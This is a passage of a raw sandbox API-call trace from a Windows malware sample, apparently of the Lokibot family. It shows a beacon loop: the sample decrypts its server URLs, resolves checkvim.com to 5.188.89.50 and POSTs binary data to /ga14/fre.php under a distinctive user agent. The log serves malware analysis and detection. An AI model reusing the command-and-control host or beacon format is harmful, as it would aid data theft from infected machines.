Size=0x40) returned 0x87fc20 [0267.388] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0267.389] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0267.395] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0267.395] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x870128) returned 1 [0267.440] GetProcessHeap () returned 0x840000 [0267.440] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0267.441] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0267.441] CryptImportKey (in: hProv=0x870128, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e2b0) returned 1 [0267.442] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0267.443] CryptSetKeyParam (hKey=0x87e2b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0267.444] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0267.444] CryptSetKeyParam (hKey=0x87e2b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0267.444] GetProcessHeap () returned 0x840000 [0267.444] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0267.446] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0267.446] CryptDecrypt (in: hKey=0x87e2b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fc20, pdwDataLen=0x19f9a4 | out: pbData=0x87fc20, pdwDataLen=0x19f9a4) returned 1 [0267.447] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0267.447] CryptDestroyKey (hKey=0x87e2b0) returned 1 [0267.448] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0267.448] CryptReleaseContext (hProv=0x870128, dwFlags=0x0) returned 1 [0267.448] GetProcessHeap () returned 0x840000 [0267.448] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0267.449] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0267.449] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0267.450] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0267.450] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0267.451] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0267.451] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0267.452] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0267.453] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0267.453] GetProcessHeap () returned 0x840000 [0267.453] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8711a0 [0267.453] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0267.453] GetProcessHeap () returned 0x840000 [0267.453] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8711a0 | out: hHeap=0x840000) returned 1 [0267.453] GetProcessHeap () returned 0x840000 [0267.453] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0267.453] GetProcessHeap () returned 0x840000 [0267.454] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fc20 | out: hHeap=0x840000) returned 1 [0267.454] GetProcessHeap () returned 0x840000 [0267.454] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f758 [0267.454] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0267.455] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0267.461] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0267.461] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x870128) returned 1 [0267.473] GetProcessHeap () returned 0x840000 [0267.473] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0267.474] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0267.474] CryptImportKey (in: hProv=0x870128, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e330) returned 1 [0267.475] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0267.476] CryptSetKeyParam (hKey=0x87e330, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0267.477] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0267.477] CryptSetKeyParam (hKey=0x87e330, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0267.477] GetProcessHeap () returned 0x840000 [0267.477] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0267.478] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0267.478] CryptDecrypt (in: hKey=0x87e330, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f758, pdwDataLen=0x19f9a4 | out: pbData=0x87f758, pdwDataLen=0x19f9a4) returned 1 [0267.479] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0267.480] CryptDestroyKey (hKey=0x87e330) returned 1 [0267.480] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0267.480] CryptReleaseContext (hProv=0x870128, dwFlags=0x0) returned 1 [0267.480] GetProcessHeap () returned 0x840000 [0267.481] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0267.481] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0267.481] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0267.482] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0267.483] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0267.483] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0267.484] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0267.484] GetProcessHeap () returned 0x840000 [0267.484] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871510 [0267.484] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8711a0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c98*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0267.485] GetProcessHeap () returned 0x840000 [0267.485] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b38 [0267.485] socket (af=2, type=1, protocol=6) returned 0x3e4 [0267.486] connect (s=0x3e4, name=0x878c98*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0267.558] FreeAddrInfoW (pAddrInfo=0x8711a0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c98*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0267.562] GetProcessHeap () returned 0x840000 [0267.562] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86ff90 [0267.562] GetProcessHeap () returned 0x840000 [0267.562] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0267.563] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0267.564] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0267.564] GetProcessHeap () returned 0x840000 [0267.564] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0267.564] GetProcessHeap () returned 0x840000 [0267.564] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0267.564] GetProcessHeap () returned 0x840000 [0267.564] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fd88 [0267.564] GetProcessHeap () returned 0x840000 [0267.564] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0267.565] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0267.566] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0267.566] GetProcessHeap () returned 0x840000 [0267.566] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0267.566] GetProcessHeap () returned 0x840000 [0267.566] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0267.566] send (s=0x3e4, buf=0x873a58*, len=237, flags=0) returned 237 [0267.566] send (s=0x3e4, buf=0x87eb58*, len=159, flags=0) returned 159 [0267.567] GetProcessHeap () returned 0x840000 [0267.567] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0267.567] recv (in: s=0x3e4, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0267.943] GetProcessHeap () returned 0x840000 [0267.943] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0267.943] GetProcessHeap () returned 0x840000 [0267.943] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fd88 | out: hHeap=0x840000) returned 1 [0267.943] GetProcessHeap () returned 0x840000 [0267.943] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0267.943] GetProcessHeap () returned 0x840000 [0267.943] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86ff90 | out: hHeap=0x840000) returned 1 [0267.943] closesocket (s=0x3e4) returned 0 [0267.944] GetProcessHeap () returned 0x840000 [0267.944] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b38 | out: hHeap=0x840000) returned 1 [0267.944] GetProcessHeap () returned 0x840000 [0267.944] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0267.944] GetProcessHeap () returned 0x840000 [0267.944] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f758 | out: hHeap=0x840000) returned 1 [0267.944] GetProcessHeap () returned 0x840000 [0267.944] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871510 | out: hHeap=0x840000) returned 1 [0267.948] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x1228) returned 0x3e4 [0267.973] Sleep (dwMilliseconds=0xea60) [0267.974] GetProcessHeap () returned 0x840000 [0267.974] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fb90 [0267.975] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0267.975] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0267.984] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0267.985] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f2d0) returned 1 [0267.991] GetProcessHeap () returned 0x840000 [0267.991] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0267.991] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0267.992] CryptImportKey (in: hProv=0x86f2d0, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e330) returned 1 [0267.992] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0267.993] CryptSetKeyParam (hKey=0x87e330, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0267.994] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0267.994] CryptSetKeyParam (hKey=0x87e330, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0267.994] GetProcessHeap () returned 0x840000 [0267.994] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0268.001] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0268.001] CryptDecrypt (in: hKey=0x87e330, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fb90, pdwDataLen=0x19f9a4 | out: pbData=0x87fb90, pdwDataLen=0x19f9a4) returned 1 [0268.002] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0268.002] CryptDestroyKey (hKey=0x87e330) returned 1 [0268.004] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0268.005] CryptReleaseContext (hProv=0x86f2d0, dwFlags=0x0) returned 1 [0268.005] GetProcessHeap () returned 0x840000 [0268.005] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0268.005] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0268.006] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0268.006] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0268.006] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0268.007] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0268.007] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0268.008] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0268.008] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0268.008] GetProcessHeap () returned 0x840000 [0268.008] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871330 [0268.008] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0268.009] GetProcessHeap () returned 0x840000 [0268.009] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871330 | out: hHeap=0x840000) returned 1 [0268.009] GetProcessHeap () returned 0x840000 [0268.009] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0268.009] GetProcessHeap () returned 0x840000 [0268.009] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb90 | out: hHeap=0x840000) returned 1 [0268.009] GetProcessHeap () returned 0x840000 [0268.009] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fd88 [0268.009] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0268.010] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0268.016] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0268.017] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fce8) returned 1 [0268.024] GetProcessHeap () returned 0x840000 [0268.024] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0268.028] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0268.028] CryptImportKey (in: hProv=0x86fce8, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e9f0) returned 1 [0268.029] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0268.029] CryptSetKeyParam (hKey=0x87e9f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0268.030] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0268.030] CryptSetKeyParam (hKey=0x87e9f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0268.030] GetProcessHeap () returned 0x840000 [0268.030] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0268.031] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0268.031] CryptDecrypt (in: hKey=0x87e9f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fd88, pdwDataLen=0x19f9a4 | out: pbData=0x87fd88, pdwDataLen=0x19f9a4) returned 1 [0268.033] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0268.033] CryptDestroyKey (hKey=0x87e9f0) returned 1 [0268.034] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0268.034] CryptReleaseContext (hProv=0x86fce8, dwFlags=0x0) returned 1 [0268.034] GetProcessHeap () returned 0x840000 [0268.034] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0268.035] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0268.035] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0268.036] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0268.036] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0268.037] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0268.037] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0268.037] GetProcessHeap () returned 0x840000 [0268.037] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871218 [0268.037] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878aa0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0268.039] GetProcessHeap () returned 0x840000 [0268.039] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b88 [0268.039] socket (af=2, type=1, protocol=6) returned 0x3e8 [0268.039] connect (s=0x3e8, name=0x878aa0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0268.106] FreeAddrInfoW (pAddrInfo=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878aa0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0268.106] GetProcessHeap () returned 0x840000 [0268.107] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f2d0 [0268.107] GetProcessHeap () returned 0x840000 [0268.107] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0268.107] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0268.108] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0268.108] GetProcessHeap () returned 0x840000 [0268.108] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0268.108] GetProcessHeap () returned 0x840000 [0268.108] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0268.109] GetProcessHeap () returned 0x840000 [0268.109] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f7a0 [0268.109] GetProcessHeap () returned 0x840000 [0268.109] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0268.109] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0268.110] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0268.110] GetProcessHeap () returned 0x840000 [0268.110] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0268.110] GetProcessHeap () returned 0x840000 [0268.110] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0268.111] send (s=0x3e8, buf=0x873a58*, len=237, flags=0) returned 237 [0268.111] send (s=0x3e8, buf=0x87eb58*, len=159, flags=0) returned 159 [0268.111] GetProcessHeap () returned 0x840000 [0268.111] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0268.111] recv (in: s=0x3e8, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0268.468] GetProcessHeap () returned 0x840000 [0268.468] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0268.468] GetProcessHeap () returned 0x840000 [0268.469] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f7a0 | out: hHeap=0x840000) returned 1 [0268.469] GetProcessHeap () returned 0x840000 [0268.469] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0268.469] GetProcessHeap () returned 0x840000 [0268.469] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f2d0 | out: hHeap=0x840000) returned 1 [0268.469] closesocket (s=0x3e8) returned 0 [0268.470] GetProcessHeap () returned 0x840000 [0268.470] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b88 | out: hHeap=0x840000) returned 1 [0268.470] GetProcessHeap () returned 0x840000 [0268.470] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0268.470] GetProcessHeap () returned 0x840000 [0268.470] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fd88 | out: hHeap=0x840000) returned 1 [0268.470] GetProcessHeap () returned 0x840000 [0268.470] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871218 | out: hHeap=0x840000) returned 1 [0268.470] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x1238) returned 0x3e8 [0268.473] Sleep (dwMilliseconds=0xea60) [0268.474] GetProcessHeap () returned 0x840000 [0268.474] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fdd0 [0268.475] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0268.475] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0268.519] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0268.520] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0268.579] GetProcessHeap () returned 0x840000 [0268.579] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0268.580] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0268.580] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e2f0) returned 1 [0268.581] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0268.581] CryptSetKeyParam (hKey=0x87e2f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0268.589] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0268.589] CryptSetKeyParam (hKey=0x87e2f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0268.589] GetProcessHeap () returned 0x840000 [0268.589] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0268.590] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0268.590] CryptDecrypt (in: hKey=0x87e2f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fdd0, pdwDataLen=0x19f9a4 | out: pbData=0x87fdd0, pdwDataLen=0x19f9a4) returned 1 [0268.590] LoadLibraryW 